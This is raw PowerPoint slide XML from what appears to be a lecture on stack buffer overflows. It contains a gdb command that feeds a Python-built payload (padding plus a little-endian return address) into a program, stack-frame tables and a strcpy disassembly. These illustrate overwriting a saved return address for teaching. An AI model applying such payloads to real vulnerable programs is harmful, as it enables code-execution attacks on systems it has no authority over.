            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1049076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defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>e9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edcb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consola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175</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98466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0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</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0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a: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0xbffff656</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176</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="357044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46822" y="119787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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="181788"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0xbffff656</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0xbffff64c</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0xbffff688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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e61</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2"/>
            <a:ext cx="6256324" cy="395369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$0x3c,</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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</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ebp</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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$0xa,</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946821" y="1567206"/>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="63500">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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755547" y="333048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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="930259"/>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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1026899"/>
            <a:ext cx="2831284" cy="373308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2540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9856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0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</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0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a: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0xbffff656</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177</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="357044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46822" y="119787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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="181788"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0xbffff64c</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0xbffff688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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e66</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2"/>
            <a:ext cx="6256324" cy="395369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$0x3c,</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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</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ebp</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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$0xa,</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
